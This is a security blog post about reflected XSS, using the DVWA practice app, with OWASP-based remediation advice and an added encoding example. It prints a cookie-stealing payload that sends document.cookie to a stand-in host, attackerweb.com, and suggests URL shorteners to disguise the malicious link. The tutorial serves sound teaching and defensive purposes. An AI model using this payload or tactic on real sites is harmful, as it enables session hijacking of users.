Published in SecureBit
Why a user-controlled pop-up is vulnerable?

Have you ever encountered the question of why a simple pop-up^, one that a user could control, makes an application vulnerable? What is the real fuss about a mere pop-up? Indeed, it’s just a pop-up; what harm can it do? We, of course, encounter several pop-ups while browsing a website, so what difference does it make if it could be controlled by you, right? What exactly is the real logic behind this scenario?

DVWA- Vulnerable to Reflected XSS

The above image shows a simple pop-up saying “test”, created while testing DVWA. Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable, made available so that security professionals can test their skills and tools in a legal environment, web developers can better understand the processes of securing web applications, and teachers/students can teach/learn web application security in a classroom environment. This was an exercise in DVWA, XSS (Reflected). You can further explore the DVWA web application for other web-based vulnerabilities by installing it from the GitHub repository digininja/DVWA.

In this article, we’ll discuss the real nitty-gritty behind the question: Why is a user-controlled pop-up vulnerable?

Let’s first understand how browsers behave; you know them, right? They are feeble and can be so unpredictable. So, here’s the deal: because of the application’s “same-origin policy”, the browser will only execute “JavaScript” code that originates from your website’s domain, say “https://yourweb.com/”; i.e., it will only do what it is forced to do. Remember the HTTP headers in request-response?

Test Scenario: In the pop-up case above, what happened is that a lone browser was simply fetching and processing the HTML, CSS, JavaScript or whatever other code you put in your application (here, DVWA), to display the page as adorably as possible. Trust me, he is obsessed with his work. But on that quest he got lost and robbed. When he encountered the <script></script> tag (the decoy bandits) in the HTML, he stopped, halted further processing of the HTML and went off looking for the script he had been directed to fetch (doing as the bandits ordered, of course; what else could he do?). So he fetched and processed the JavaScript hidden inside the <script> tags. There he encountered an alert statement (hands up, hand over the money) and executed the contents of that method. Here, he was ordered to take the user’s focus away from the page and display the message “test” (it could be anything, as you’ll see). After this, the feeble browser ran away as far as possible and went back to rendering the HTML he had been working on, with a heavy heart and fewer jingles in his pocket. And just so you know, all of this happened really quickly.

The code looked something like: <script>alert("test")</script>

Conclusion: the browser is an idiot. He will go ahead and look for your domain name in the request, and if he finds it, he takes it as you, the master, ordering him to do a task. Yes, he’ll just do it. ✔

So, as said, the website is vulnerable to XSS, more precisely Reflected XSS, also known as First Order XSS (or, say, a user-controlled pop-up; okay, I give up, no more nomenclature now). The attacker can craft a malicious request like*:

Evil Code: "https://yourweb.com/somepage.ex?vulnerableparameter=<script>var+x=new+Image;+x.src="https://attackerweb.com/"%2bdocument.cookie;</script>"

Did you notice what I just did there? Let me explain, the actions taken are-

  1. redirection to the attacker’s website: “https://attackerweb.com/”
  2. theft of the cookie generated by your website
  3. and lastly, grief for your pitiful soul: your session is mine.

Code decoded: var x = new Image; x.src = "https://attackerweb.com/" + document.cookie;

You can understand the decoded part above, right? Further, a stolen cookie can be used to authenticate a session on your website, granting the attacker full access to your account there.

  • Note: Action Required- a logged-in victim (here, you) needs to be tricked into clicking the malicious link, which is no hurdle, as you (I don’t trust anyone) readily trust unknown URLs. Moreover, the request looks legit, as it originates from a trusted website (https://yourweb.com/). Also, URL shorteners, like Bit.ly, Free URL Shortener, etc., could be used to make the link look appealing.

^What actually is a pop-up?

Just JavaScript code, placed on your website, that the browser executes when you order it to. So, if JavaScript on your website can be controlled by the user, you now know what harm it can do.

So, now, the Remediation-

What can you do?

  • Firstly, do not fall for social engineering gimmicks. Do not click the unknown URL/images/kitty faces/yes, all the other unknowns (I repeat, do not; or, well, just leave it, go ahead, I’m no one to speak for you, it’s all yours).
  • If you really have to check your account, go to the original website, authenticate & make the required changes. Yeah, you heard me. Always validate, look where you are going. In case of code red, try ctrl + z, abort the task (and pray it works).
  • On a serious note, to prevent XSS on your website, follow the rules below:
  1. Never Insert Untrusted Data Except in Allowed Locations
  2. HTML Encode Before Inserting Untrusted Data into HTML Element Content
  3. Attribute Encode Before Inserting Untrusted Data into HTML Common Attributes
  4. JavaScript Encode Before Inserting Untrusted Data into JavaScript Data Values
  5. CSS Encode And Strictly Validate Before Inserting Untrusted Data into HTML Style Property Values
  6. URL Encode Before Inserting Untrusted Data into HTML URL Parameter Values
  7. Sanitize HTML Markup with a Library Designed for the Job
  8. Avoid JavaScript URLs
  9. Properly use modern JS frameworks
  10. Implement- X-XSS-Protection Header
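To see rules 2 to 4 in action, here is an added example (not DVWA’s or the author’s code) that puts the article’s reflected pop-up payload through a DVWA-style vulnerable rendering and its encoded form; the "Hello name" page, the function names and the script-tag check are assumptions for illustration.

```javascript
// Added example (not DVWA's or the author's code): the reflected-XSS pattern
// from the article next to its hardened form, with the OWASP encoders the
// remediation list names. Plain Node.js, no dependencies.

// Rule 2: HTML-entity encode before putting untrusted data in element content.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Rule 3: attribute encode; every non-alphanumeric becomes &#xHH; so even an
// unquoted attribute value cannot be broken out of.
function attrEncode(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (c) => '&#x' + c.charCodeAt(0).toString(16).toUpperCase() + ';');
}

// Rule 4: JavaScript encode (\xHH / \uHHHH), for use inside a quoted JS string
// literal only, never for building bare script.
function jsEncode(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// The DVWA-style bug: the query parameter is concatenated straight into HTML,
// so the browser treats any <script> the user typed as real markup.
function renderVulnerable(name) {
  return '<pre>Hello ' + name + '</pre>';
}

// Hardened: encode for the exact context the value lands in (element content).
function renderSafe(name) {
  return '<pre>Hello ' + htmlEncode(name) + '</pre>';
}

// Cheap check on a response body: does a live script tag survive rendering?
function containsLiveScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed probe: the same pop-up payload the article shows.
const PROBE = '<script>alert("test")</script>';
console.log(renderVulnerable(PROBE), containsLiveScriptTag(renderVulnerable(PROBE)));
console.log(renderSafe(PROBE), containsLiveScriptTag(renderSafe(PROBE)));
```

The encoded output still displays the literal text "<script>alert("test")</script>" to the user, but the browser no longer parses it as a tag, which is exactly the difference between a harmless string and a pop-up.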

For more info, don’t forget to refer to: OWASP XSS CheatSheet.

I know what you are thinking, an unknown link at the end of the post. No, I’m not doing any gimmicks on you. You can trust me (or not, evil laughs). Did you get that? 👾

goswamiijaya

Cyber Security Consultant-Deloitte | CEH | Cyber Threat Intelligence (CTI) | VAPT